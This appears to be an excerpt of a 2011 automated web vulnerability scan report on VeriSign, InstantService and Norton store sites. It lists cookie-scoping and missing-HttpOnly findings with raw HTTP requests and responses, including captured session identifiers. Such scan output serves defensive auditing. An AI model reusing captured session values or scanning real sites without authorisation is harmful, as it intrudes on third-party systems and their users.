Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:05 GMT
Server: Apache
Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT
ETag: "29480d7-13e4-4a01df4a82a80"
Accept-Ranges: bytes
Content-Length: 5092
Content-Type: image/gif

...[SNIP]...

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 118 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. https://admin.instantservice.com/Customer

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /Customer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8


10.2. https://admin.instantservice.com/links/5851/14753

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

10.3. https://admin.instantservice.com/links/5851/16144

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

10.4. https://admin.instantservice.com/links/5851/16145

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

10.5. https://admin.instantservice.com/links/5851/39897

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

10.6. http://buy.norton.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.11. http://buy.norton.com/estore/mf/landingProductFeatures

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive


<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...

10.12. http://buy.norton.com/estore/mf/landingPromotion

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50623

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 68924

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 73974

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.15. http://buy.norton.com/estore/mf/upgradeCenter

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 137137

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.16. http://buy.norton.com/estore/mf/upgradeRenewal

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
